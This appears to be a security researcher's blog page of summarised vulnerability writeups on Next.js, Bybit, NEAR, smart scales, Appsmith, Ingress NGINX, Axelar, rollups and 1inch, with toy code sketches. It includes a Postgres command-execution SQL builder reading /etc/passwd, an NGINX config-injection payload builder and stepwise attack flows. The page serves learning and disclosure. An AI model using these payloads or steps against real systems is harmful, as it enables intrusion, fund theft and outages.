Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Next.js and the corrupt middleware: the authorizing artifact- 1626

zhero___    Reference →Posted 11 Months Ago
  • NextJS is a super popular React framework with a ton of extra functionality. In fact, this website is built on top of it. The author of this post was reviewing NextJS and found a way to circumvent the middleware, which is commonly used for authentication.
  • Within the framework, there is a check for recursive requests - for instance, when the middleware itself makes a request to the server. This is done by setting the x-middleware-subrequest header to the path of the middleware being executed. Each piece of middleware that runs appends its path to a colon-delimited list. If a middleware has already been seen in that list, the code simply skips it.
  • As it turns out, it's possible to specify this header yourself! So, if you know the path of the middleware you want to skip, adding x-middleware-subrequest: my_path causes it to be skipped entirely. If the middleware is used for authentication/authorization, that's a horrible vulnerability. The path is somewhat guessable, and the header can be used as a polyglot as well.
  • Initially, they found this in an old version of the package. Since that code had been removed, they assumed only older versions were affected. In reality, the code had been moved somewhere else. It's best to report vulnerabilities, even if they only affect older versions. You never know what you're missing about impact as a bug hunter.
  • Instead of needing to guess a path, newer versions make it super simple: the path is just middleware or src/middleware. The change of path actually makes exploitation easier. Additionally, there is now a recursion check with a maximum depth of 5, so middleware: just needs to be repeated 5 times now.
  • They used this exploit on a few bug bounty programs. One program was using the middleware as a rewrite rule. They knew this because of a header in the response. By using this vulnerability, they were able to visit the admin page. On another program, they used this as a cache poisoning DoS via forcing a 404 response by skipping the rewrite rules.
  • Overall, an excellent write up on the discovery and exploitation of a NextJS vulnerability. I learned a ton about the framework, exploitation, and proper disclosure from this. Great work!

In-Depth Technical Analysis of the Bybit Hack- 1625

Mario Rvias - NCC Group    Reference →Posted 11 Months Ago
  • Bybit suffered a $1.4 billion theft of crypto assets - 401K ETH - drained from a cold wallet. They use Safe{Wallet} with a 3-of-X multisig. If all of those signers reviewed what they were signing, then what happened?
  • Attackers compromised the Safe{Wallet} UI. So when the Bybit folks were signing off on the transaction and reviewing the details, they were signing off on the wrong thing! The malicious JavaScript specifically targeted Bybit.
  • Instead of transferring any funds, a delegateCall was made to a contract controlled by the attacker. At this point, they were able to modify the Safe contract storage to change the proxy slot. Future calls to the contract would then go through the attacker's proxy implementation, allowing complete ownership of the assets at the address. Stealing funds is trivial at this point.
  • What would the signers have seen? On the web page, they saw the original transaction. What about the wallet? They would have seen raw bytes with no real meaning in them. Brutal... Overall, a good look into the exploit.
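The danger of that delegateCall can be shown with a toy model (a deliberate simplification of EVM semantics, not Safe's actual code): delegatecall runs the callee's code against the caller's storage, so attacker code can rewrite the proxy's implementation slot.

```python
# Toy model of delegatecall semantics (simplified; not Safe's actual code).
class Contract:
    def __init__(self, storage: dict):
        self.storage = storage

def delegatecall(caller: Contract, callee_code) -> None:
    # delegatecall executes the callee's code in the CALLER's storage context
    callee_code(caller.storage)

safe_proxy = Contract({"implementation_slot": "0xSafeMasterCopy"})

def attacker_code(storage: dict) -> None:
    # Rewrites the proxy slot so all future calls hit attacker logic
    storage["implementation_slot"] = "0xAttackerContract"

delegatecall(safe_proxy, attacker_code)
# safe_proxy now forwards every future call to the attacker's implementation
```

This is why a single signed delegateCall is game over: the signature authorized one call, but that call permanently rerouted the wallet itself.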

Total NEAR Shutdown- 1624

Neumo    Reference →Posted 11 Months Ago
  • NEAR is a blockchain with a unique runtime and architecture from EVM chains. The network is broken into shards of validators to support lots of transactions on the network. This uniqueness is what drew the authors to this program.
  • Upon initial analysis of the codebase, the receipt processing looked sketchy. The error handling appeared extremely complex yet solid at first glance. Eventually, they noticed a new change: max_receipt_size. To me, this is interesting - small changes can create subtle new invariants that were not there before.
  • The validation of the receipt size was done in multiple locations. Notably, it only happened on intake. In some scenarios, the receipt size could be increased during execution. In particular, if a receipt points to another receipt and the data from that other receipt is added to the original, the actual size increases without validation. A receipt sitting barely below the size limit that then gets expanded causes some havoc.
  • When being processed again as an incoming_receipt by other nodes, the exceeded size limit leads to a panic being hit. From their report, they were hunting for possible panics in the codebase and how to hit them. Aka, sink-to-source bug hunting.
  • The impact is that all nodes receiving the receipt immediately crash. Some nodes would likely bounce back via watchdog programs but would then crash again. Once this receipt is dropped, the contract could be called again to trigger this crash over and over again though.
  • The solution is somewhat interesting: the fix actually removes the receipt-size validation from the function validate_receipt. In particular, they ONLY want to check size constraints during creation, not expansion. I would have expected a check to be added on the expansion code to not exceed the limit, so this patch surprised me.
  • The auditors were not thrilled with their payout. It was rated as a high-severity issue, which has a range of 20K-200K. A similar vulnerability had been paid 150K. They were paid out less than half, so likely something between 80K-100K, which is still great money. The authors claimed that they never talked directly with NEAR themselves - they only talked with HackenProof, who talked to NEAR for them.
  • From my perspective, programs are going to pay out what they want to pay out. When the previous vulnerability was reported, maybe NEAR was doing better financially; there's more to deciding a payout than just the impact of the vulnerability, especially when funds are not directly at risk. Immunefi does have a different business model that seems to push for higher payouts. I appreciate the insight into the HackenProof experience though.
  • Overall, a fun bug! Sink-to-source bug hunting works well, and the addition of the max receipt size introduced a funny invariant. Searching for panics and ways to trigger them is a great way to find DoS bugs.
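The broken invariant can be sketched as follows (a hypothetical simplification of NEAR's receipt handling, with made-up names and a made-up limit):

```python
# Hypothetical sketch of the validate-on-intake-only bug (names made up).
MAX_RECEIPT_SIZE = 100

class ReceiptTooLarge(Exception):
    pass

def validate_incoming(receipt: bytes) -> None:
    # Size is checked here, on intake only...
    if len(receipt) > MAX_RECEIPT_SIZE:
        raise ReceiptTooLarge(len(receipt))

def attach_dependency_data(receipt: bytes, dep_data: bytes) -> bytes:
    # ...but NOT here, where data from a dependent receipt is appended,
    # so the receipt can silently grow past the limit during execution.
    return receipt + dep_data

receipt = b"A" * MAX_RECEIPT_SIZE                      # at the limit: accepted
validate_incoming(receipt)
receipt = attach_dependency_data(receipt, b"B" * 50)   # now oversized
# Any node that re-validates this as an incoming receipt hits the size
# check and panics - crashing every node that processes it.
```

The patch resolved the inconsistency in the opposite direction from this sketch: rather than adding a check to the expansion path, the size check was removed from re-validation.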

Pwning Millions of Smart Weighing Machines with API and Hardware Hacking- 1623

Space Raccoon    Reference →Posted 11 Months Ago
  • While at a gym, the author noticed a WiFi symbol on a scale. Upon doing further research, they realized that all of the products on Amazon were made by the same OEM with marginally different codebases. The mobile apps were even the same. So, the author decided to try to remotely hack these devices.
  • Before even buying a device, they reverse engineered the mobile app to find APIs. To their horror, the firmware update APIs suffered from simple SQL injections. This let them enumerate devices and their authentication secrets without having the physical box. Some fun SQLi WAF bypasses were required to make this work.
  • From there, they decided to get a shell on the device for further testing, by connecting over UART on one of the scales. This was useful for debugging the linking flow of the scale. In particular, they wanted to know how the API servers communicated with the scale itself and through the user's phone app.
  • The scale would receive WiFi credentials via Bluetooth. The device uses mTLS to get a session token for authentication. The user-device association could be done in two ways: one initiated by the user and another by the scale. All of these properly check the deviceid against the session token and other fields, making this pretty solid.
  • While messing around with the parameters, they were intrigued by the multiple ways to do auth. Eventually, they tried mixing-and-matching the two flows for tying the user and device together. By providing a user session token but a deviceid header for a device the attacker doesn't own, the request authenticates as the user but is treated as a device-initiated request because of the header. So, the server assumes the device is valid when it really isn't. The explanation and the code snippet they provide help a lot with this.
  • Several good bugs! From a blackbox perspective, multiple authentication schemes coming together is tricky to get right. The SQL injection bug was trivial but they had to put other work in order to find these APIs. You always need to put in the work but it's just in different areas sometimes, such as reverse engineering.
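The auth-mixing bug can be sketched like this (hypothetical server logic with made-up names and tokens; the post's actual code differs):

```python
# Hypothetical sketch of the mixed user/device auth flows (names made up).
USER_SESSIONS = {"user-token-123": "alice"}     # attacker's own valid session
DEVICE_SECRETS = {"scale-42": "device-secret"}  # victim's scale

def link_device(session_token: str, headers: dict) -> str:
    user = USER_SESSIONS.get(session_token)
    if user is None:
        raise PermissionError("bad session")
    device_id = headers.get("X-Device-Id")
    if device_id is not None:
        # BUG: the mere presence of the header makes the server treat this
        # as a device-initiated request, skipping proof of device ownership.
        return f"linked {device_id} to {user}"
    raise PermissionError("no device proof")

# The attacker authenticates as themselves but names the victim's device:
result = link_device("user-token-123", {"X-Device-Id": "scale-42"})
```

Each flow is safe on its own; the hole only opens when fields from one flow are honored inside the other.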

Henlo Kart post mortem- 1622

henlokart    Reference →Posted 11 Months Ago
  • The team behind the Henlo Kart product was working on publishing two public packages to NPM. They were worried about sensitive files, such as .env (containing deployment credentials), being leaked, so these were excluded via the .gitignore file. For the initial publish of the two packages, this worked well.
  • Later, an update to one of the packages was made - they wanted to exclude additional files from NPM. So, they created an .npmignore file to do this. Surprisingly, the presence of this file caused the .gitignore to be ignored! This meant the sensitive .env file was published. It contained a private key for the deployer account.
  • After a few hours, they noticed the error. They attempted to revoke the package version, but this was not allowed because other packages they created depended on it. By the time they contacted NPM to remove the package, the damage was done - the key had been exposed. An attacker found it.
  • The attacker took about 60 ETH that was sitting in Aave. Additionally, they took control of the core Henlo contract, giving them the ability to mint new tokens. The team was able to recover some of the funds, but the damage had been done. So, they rebranded the product and launched a new token from the previous snapshots.
  • The attackers are real! This is a sad reminder of that. Good explanation of the attack and the failures though.
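The ignore-file behavior that caused this can be modeled in a few lines (a simplified model: npm consults .npmignore instead of .gitignore whenever both exist; real matching uses glob patterns):

```python
# Simplified model of npm's ignore-file precedence (real matching uses globs).
def published_files(files, gitignore, npmignore):
    # If .npmignore exists, .gitignore is not consulted at all.
    ignored = npmignore if npmignore is not None else gitignore
    return [f for f in files if f not in ignored]

# Initial publish: only .gitignore exists, so .env stays private.
assert ".env" not in published_files([".env", "index.js"], {".env"}, None)

# Later update: adding an .npmignore (without .env) leaks the secret.
assert ".env" in published_files([".env", "index.js"], {".env"}, {"docs/"})
```

The second case is exactly the Henlo Kart failure: the new .npmignore silently dropped every exclusion the .gitignore had been providing.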

CVE-2024-55963: Unauthenticated RCE in Default-Install of Appsmith- 1621

Whit Taylor - Rhino Security    Reference →Posted 11 Months Ago
  • Appsmith is an open-source developer tool designed to help organizations build internal applications, such as dashboards, admin panels, and customer support tools. It has three roles - admin, developer and app viewer.
  • Appsmith has datasources that allow applications to use information from various databases and other endpoints - many of these run locally. One of these, configured by default, is a PostgreSQL database. Its configuration allows logging into the database as any user without providing a password, since the connection is made server-side.
  • Interacting with PostgreSQL requires a valid account. Although the app requires an invitation to join existing workspaces, its default configuration allows user signup! A user can then create their own workspace and application to expose the vulnerable functionality.
  • The application that the user creates allows login as the PostgreSQL superuser via the web console. Using this, it's possible to run cat /etc/passwd from a SQL query. Since this is the superuser, it's effectively game over.
  • There are two other bugs but this one was by far the most interesting. Good find!
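The post's exact query isn't reproduced here, but one standard way a PostgreSQL superuser runs shell commands like cat /etc/passwd from SQL is COPY ... FROM PROGRAM; an illustrative payload builder (the query shape is an assumption, not necessarily what the researchers used):

```python
# Illustrative only: a classic Postgres-superuser command-execution pattern.
# (The writeup's exact query may differ - COPY FROM PROGRAM is one known route.)
def superuser_exec_sql(command: str) -> str:
    # COPY ... FROM PROGRAM runs the command server-side and captures stdout,
    # which is why superuser access to Postgres is effectively shell access.
    return (
        "DROP TABLE IF EXISTS cmd_output; "
        "CREATE TABLE cmd_output (line text); "
        f"COPY cmd_output FROM PROGRAM '{command}'; "
        "SELECT line FROM cmd_output;"
    )

payload = superuser_exec_sql("cat /etc/passwd")
```

This is also why "login as any user, server-side, no password" is far worse than it first sounds: the superuser role carries OS-level reach, not just data access.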

IngressNightmare: 9.8 Critical Unauthenticated Remote Code Execution Vulnerabilities in Ingress NGINX- 1620

Wiz.io    Reference →Posted 11 Months Ago
  • The Ingress NGINX Controller for Kubernetes is a popular ingress controller for managing incoming network traffic and routing it to the proper Pod. It's built on top of the popular NGINX reverse proxy software. The author claims that 41% of internet-facing clusters use this software. Since it's internet-facing, an authentication bypass or an RCE bug would be catastrophic for these services.
  • The service translates Kubernetes Ingress objects into NGINX configurations. The Admission Controller is a Kubernetes component that reviews, modifies, and blocks requests to the API server. These controllers don't require authentication.
  • In the Admission Controller code, the AdmissionReview request generates a temporary NGINX configuration file from a template. Then, to test for validity, it runs nginx -t. Since the configuration file contains user-controlled inputs, the endpoint is unauthenticated, and the config is executed, this makes it a great attack surface.
  • The authreq parameter is used for authentication-related annotations. However, this field has zero input sanitization, so it's possible to inject arbitrary directives into the NGINX configuration file. There are several other variants of this in the authtls and mirror parameters. So, why is this injection a big deal?
  • The NGINX configuration format has a lot of directives, many of which are undocumented. The ssl_engine directive is able to load shared libraries, without the top-of-file restriction that load_module has. This allows execution of arbitrary code, but requires a file to already be on the system.
  • The pod runs an NGINX instance itself. When NGINX processes a request, the body is saved to a temporary file if it's large enough. Although NGINX removes the file immediately, an open file descriptor remains visible in the /proc file system. Using this, it's possible to reference the contents of the file from the NGINX configuration. To make this race condition easier, making the Content-Length larger than the body keeps NGINX waiting. Sadly, this requires brute forcing PIDs and file descriptors, but that's worth the trouble.
  • Here's the full path to RCE:
    1. Upload the .so payload by abusing the file buffer feature.
    2. Send an AdmissionReview request to the controller with directive injections. In particular, inject the ssl_engine to load the shared library from step 1.
    3. Try different PID paths over and over again. Eventually, it will execute and you'll get RCE.
  • Overall, a great write up on a relatively unknown attack surface. It shows that running nginx -t can lead to code execution, making configuration injection a very serious vulnerability.
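The injection in step 2 might be assembled roughly like this (the annotation name and injected-string layout are assumptions based on the description above, not the post's verbatim payload):

```python
# Hypothetical sketch of the AdmissionReview config injection.
# The annotation key and injection framing are assumptions for illustration.
import json

def malicious_admission_review(pid: int, fd: int) -> str:
    # Close out the templated directive, then add ssl_engine pointing at the
    # request-body file still held open in /proc (the uploaded .so payload).
    injected = f"http://example.com/;\nssl_engine /proc/{pid}/fd/{fd};\n#"
    review = {
        "kind": "AdmissionReview",
        "request": {
            "object": {
                "kind": "Ingress",
                "metadata": {
                    "annotations": {
                        "nginx.ingress.kubernetes.io/auth-url": injected
                    }
                },
            }
        },
    }
    return json.dumps(review)
```

When nginx -t validates the resulting config, ssl_engine loads the shared library and the payload runs; the PID/fd values are what gets brute forced in step 3.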

Halting Cross-chain: Axelar Network Vulnerability Disclosure- 1619

Macro Nunes    Reference →Posted 1 Year Ago
  • Axelar is a cross-chain bridging protocol. To come to agreement on whether a cross-chain event has happened, 60% of the stake on Axelar has to approve it. The voting is performed on the Axelar blockchain, which is a Cosmos SDK chain. The off-chain listener is called vald.
  • There are uptime requirements for all of the voters, called chain maintainers, of a particular chain. Validators who miss votes will be deregistered and lose rewards.
  • Once the ContractCall on an Axelar gateway contract is made, the vald program will see this and vote on the Cosmos Axelar chain. To do this, they call ConfirmGatewayTxs.
  • While reviewing the configuration settings of the Axelar chain validators, they noticed the max_body_bytes setting. This is the maximum number of bytes that can be in a request - 1MB. If this limit is exceeded, the Axelar node will drop the request. This setting is seldom changed and 1MB is the default value in the official setup instructions. By forcing the ConfirmGatewayTxs transaction to be larger than 1MB, with excessive amounts of logs, the voting transactions from vald would be rejected!
  • By itself, this isn't a huge deal. However, it becomes interesting once you consider the voting penalties. Remember, if a certain number of votes are missed, the chain maintainers are deregistered. The voting has no minimum quorum check: if there's a poll to vote on, even if nobody can vote or does vote, the chain maintainers will get slashed for it.
  • The author does some cost analysis. To take down all major chains, it would cost $5K. In the future, it would cost another $11 per chain to do this again. Here's the flow of the attack:
    1. Create 2 malicious transactions that make 2000 ContractCall logs on the Axelar Gateway.
    2. Call ConfirmGatewayTxs on Axelar with the txids from the events listed. At this point, vald detects the polls and tries to vote but fails because of the size of the HTTP request.
    3. Do step 2 over and over again until the chain maintainers are deregistered.
  • The impact of this is pretty severe - it stops Axelar in its tracks on all chains. Initially, Axelar rated this as a medium and offered 5K, considering it a "liveness vs. security" issue; they increased this to 20K, but that was still rejected. After multiple follow-ups from Immunefi, it was upgraded to a critical at 50K. You gotta love Immunefi and their help towards hackers!
  • This vulnerability is a great win for public disclosure. The bug had not been fixed when this was published. However, within a few days of publishing the post, the issue was fixed by disabling auto-deregistration altogether. Without the public disclosure, this vulnerability may not have been fixed.
  • To me, the real vulnerability was the missing minimum vote check before slashing. It's weird that Axelar fixed this by removing the deregistration. I personally love this post of taking a "small thing" to abuse a fundamental design issue.
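That missing-quorum slashing logic can be sketched as follows (a hypothetical simplification with made-up names and a made-up miss threshold; only the 1MB limit comes from the post):

```python
# Hypothetical sketch: slashing proceeds even when zero votes could land.
MAX_BODY_BYTES = 1_000_000  # the 1MB Cosmos RPC default noted in the post
MISSED_VOTE_LIMIT = 3       # made-up deregistration threshold

def submit_vote(vote_tx_bytes: int) -> bool:
    # vald's vote is dropped if attacker-bloated logs push it past the limit
    return vote_tx_bytes <= MAX_BODY_BYTES

def run_poll(missed_votes: dict, vote_tx_bytes: int) -> None:
    for name in missed_votes:
        if not submit_vote(vote_tx_bytes):
            # BUG: no minimum-quorum check - everyone is penalized even
            # though NOBODY's vote could physically be accepted.
            missed_votes[name] += 1

missed_votes = {"validator-a": 0, "validator-b": 0}
for _ in range(MISSED_VOTE_LIMIT):
    run_poll(missed_votes, vote_tx_bytes=2_000_000)  # oversized by design

deregistered = [n for n, missed in missed_votes.items()
                if missed >= MISSED_VOTE_LIMIT]
```

A quorum check before slashing (skip penalties when no votes landed at all) would have broken the attack without touching deregistration, which is why the actual fix of disabling auto-deregistration reads as odd.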

DoubleUp Roll: Double-spending in Arbitrum by Rolling It Back- 1618

Hong Kong Polytechnic    Reference →Posted 1 Year Ago
  • Arbitrum and Optimism are Optimistic Rollups. This means they are L2 blockchains that inherit the security of the L1 by posting all of the L2 data to the L1. There are several roles within these blockchains:
    • Sequencer: Creates the blocks from the submitted transactions to its private mempool.
    • Batcher: Posts the transaction information to the Ethereum L1. This allows deriving the state of the L2 from Ethereum alone, making it a rollup instead of a sidechain.
    • Publisher: Posts the L2 consensus state to Ethereum. There is also a Challenger that can submit fraud proofs if something is done wrong by the Publisher.
  • The transaction lifecycle of an L2 is as follows:
    1. User submits transaction to RPC on L2 or to specific contract on L1.
    2. Sequencer creates a block and broadcasts it to the L2. The block is soft finalized.
    3. The block information is posted to Ethereum via the Batcher role for the Data Availability part of a rollup.
    4. The posted batch is seen by the L2 nodes. This makes the block hard-finalized.
    5. If the batch is different than the current state of the L2 then a rollback is done on the soft-finalized transactions.
  • There are three scenarios where rollbacks can occur that are relevant:
    • If the block timestamp gap between the L1 and the L2 is too large, the block will be rolled back. This is a security mechanism to prevent too much manipulation of block.timestamp in Solidity.
    • In case of the Sequencer going down, transactions can be forced through the L1 after a 24-hour delay. If a transaction was in an L2 block but never included on the L1, this forced inclusion will trigger a rollback.
    • Batch information posted to the L1 being invalid and failing to process. This leads to a rollback on the L2.
  • The goal of this paper is to forcibly trigger rollbacks to achieve a double spend via deposits/withdrawals, or, after a large number of blocks have passed, to break bridges. Using the rollback mechanisms above, this is what they do. Of course, this requires some tomfoolery to get transactions delayed properly.
  • In the Overtime attack, the goal is to change the time on a deposit that has already been used. It works as follows:
    1. Cause a major delay in the batch processing. There is no one way to do this.
    2. Submit deposit to the L2.
    3. L2 accepts the deposit.
    4. The Batcher is unable to submit the deposit to the L1 because of the batching delays from step 1.
    5. Attacker initiates and gets a withdrawal accepted for their recent deposit.
    6. The time-bound mechanism springs into action! The L2 has its block rolled back.
    7. L1 deposit is processed in the new L2 block. Now, we have two sets of funds from the same deposit. Personally, I'm confused on how the withdrawal gets processed before the redoing of the finalization on the L1.
  • In the QueueCut Attack, the liveness preservation is abused.
    1. Introduce a delay in the L2-to-L1 comms by adding a bunch of transactions with incompressible data.
    2. Trigger a deposit from the L1. This will be soft-finalized immediately.
    3. Trigger a withdrawal on the L2 with that deposit. This will be processed quickly.
    4. Because of the delay and queue, the force inclusion feature can now be used. Use this to trigger a deposit.
    5. Force inclusion negates the L2 block that had the original deposit. Hence, we have a double spend.
  • The ZipBomb attack makes data incompressible from the perspective of the Sequencer. This leads to the L1 refusing to process the L2 block, causing a rollback. To me, the asynchronous processing is weird. I thought that blocks would build on each other and require a perfect order. In reality, this isn't the case, which allows for the weird ordering of things. I imagine that many of these ideas came from noticing a bad state machine rather than from the rollback mechanics being DoSable.
  • The fixes to these bugs are not just a couple lines of code - they are design-level fixes because of the asynchronous processing. Both Optimism and Arbitrum now have a streaming mechanism to ensure that blocks can always be handled. To mitigate the ZipBomb attack, Arbitrum now only cares about the plaintext size on submission and not the compressed size.
  • On Optimism, they added a fee prioritization structure instead of a first-come-first-served queue. Additionally, instead of the more complicated one-block-per-transaction strategy, they now use a 2-second fixed interval. As far as cross-chain bridges go, there are still some concerns. They urged products to wait for L1 inclusion instead of L2 block confirmations.
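The core of both double-spend flows - a withdrawal paid out of soft-finalized state that a later rollback erases - can be modeled roughly as (a hypothetical, heavily simplified state machine, not either chain's real derivation logic):

```python
# Heavily simplified model of a soft-finalized deposit surviving a rollback.
class L2:
    def __init__(self):
        self.soft_blocks = []   # sequencer-confirmed, not yet derived from L1
        self.hard_blocks = []   # derived from batches posted to the L1

    def soft_finalize(self, tx: str) -> None:
        self.soft_blocks.append(tx)

    def rollback_and_rederive(self, l1_batch: list) -> list:
        # Time-bound / forced-inclusion rules discard the soft blocks and
        # rebuild state from the L1 batch alone.
        paid_out = [tx for tx in self.soft_blocks if tx.startswith("withdraw")]
        self.soft_blocks = []
        self.hard_blocks = l1_batch
        return paid_out  # value that already left before the rollback

l2 = L2()
l2.soft_finalize("deposit#1")
l2.soft_finalize("withdraw#1")          # attacker cashes out off soft state
paid = l2.rollback_and_rederive(["deposit#1"])  # deposit replays post-rollback
# The attacker keeps the withdrawal AND the re-processed deposit: double spend.
```

The Overtime and QueueCut attacks are two different levers (timestamp bounds vs. forced inclusion) for making that rollback-and-rederive step fire on demand.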

Yul Calldata Corruption — 1inch Postmortem- 1617

Omar Ganiev    Reference →Posted 1 Year Ago
  • 1Inch is a limit order swap DeFi platform. 1Inch Fusion is a gasless swap protocol built on top of the core Limit Order Protocol. This version was deprecated in 2023 but was kept alive for backwards compatibility reasons. The original implementation had over 9 audits.
  • Recently, the V1 protocol was hacked. Looking at the exploit transactions, it starts off looking very normal. Then came a red flag: both the taker and the maker on the swap were the same. Additionally, the attacker had made over 1M USDC on the trade.
  • Upon settlement of the limit order, a call to resolveOrders is made to a contract. This code appeared very similar to the example integration and looked pretty safe. Upon closer inspection, the victim contract had not been updated even though the protocol's interfaces had changed.
  • The vulnerability is around the lack of validation on resolver. This is NOT intended to be a controlled element of settleOrder. In fact, it's passed in as new bytes(0) since only the contract itself should be able to set it. How was this controlled? What gives? The woes of multiple versions!
  • Much of this code is written in Yul, the assembly language of Solidity. In the Yul, a memory pointer ptr is used. When writing a value called the suffix, it's written at an offset that depends on the passed-in interactionLength. interactionLength is a full 32-byte word, which can overflow when computing ptr + interactionOffset + interactionLength. Because of this overflow, the pointer can be decreased to write the user-controlled suffix to any location! Sounds like memory corruption!
  • Here's the full flow of the attack:
    1. Create a swap order that swaps a few wei for millions. Normally, this would obviously be rejected.
    2. Specify an oversized interactionLength value so the overflowed pointer points at the resolver address.
    3. Add a fake suffix structure to overwrite the resolver address.
  • The authors of this post did the internal investigation but also performed several of the audits on the protocol. So, what happened? Initially, the resolver contract code wasn't in scope for audits, so it was ignored. In March of 2023, these auditors actually found the integer overflow while assessing the scope. However, shortly after, the code was completely rewritten, so they didn't feel it was necessary to call it out.
  • Here's the interesting twist: this previous version of the contract had already been deployed and the auditors didn't know it. Additionally, they were unsure about the impact of the vulnerability, so they moved on from it.
  • How can we prevent this type of thing from happening in the future?
    1. Clearly define what code is being used. It's acceptable to have multiple versions, but all of them need to be audited.
    2. Informational findings are helpful. Something may have more impact than an auditor initially realizes.
  • Overall, a super cool postmortem on the exploitation of this vulnerability. The vulnerability is unique and I love the analysis on how this slipped through the cracks.
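The 256-bit pointer wraparound at the heart of the bug can be demonstrated directly (illustrative arithmetic with made-up memory offsets; the real values live in 1inch's Yul code):

```python
# Illustrative 256-bit wraparound, as in Yul's unchecked pointer arithmetic.
WORD = 2 ** 256

def write_target(ptr: int, interaction_offset: int, interaction_length: int) -> int:
    # Yul addition wraps modulo 2^256 - there is no overflow check.
    return (ptr + interaction_offset + interaction_length) % WORD

ptr, interaction_offset = 0x200, 0x40  # made-up memory layout

# An honest length lands the suffix write past the interaction data:
assert write_target(ptr, interaction_offset, 0x20) == 0x260

# A near-2^256 "length" wraps the pointer BACKWARDS to a chosen slot,
# e.g. wherever the resolver address sits in memory (0x100 here, made up):
evil_len = WORD - 0x140
assert write_target(ptr, interaction_offset, evil_len) == 0x100
```

Because Solidity's checked arithmetic doesn't apply inside Yul blocks, a single unvalidated 32-byte word turns offset math into an arbitrary-write primitive.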